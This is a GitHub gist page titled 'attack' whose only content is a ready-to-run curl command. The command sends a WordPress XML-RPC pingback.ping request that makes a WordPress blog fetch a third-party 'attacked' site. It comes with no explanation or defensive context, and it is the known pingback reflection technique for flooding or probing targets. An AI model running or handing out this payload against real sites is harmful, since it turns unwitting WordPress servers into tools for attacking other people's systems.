Skip to content

Instantly share code, notes, and snippets.

@tieppt
Last active August 29, 2015 14:27
Show Gist options
  • Save tieppt/44efad40c0fc1403509a to your computer and use it in GitHub Desktop.
Save tieppt/44efad40c0fc1403509a to your computer and use it in GitHub Desktop.
attack
curl http://www.site-wp.com/xmlrpc.php -d
'<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>
pingback.ping</methodName><params><param><value>
<string>http://attacked.site.com/link_to_post
</string></value></param><param><value><string>
http://www.site-wp.com/any_blog_post/
</string></value></param></params></methodCall>'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment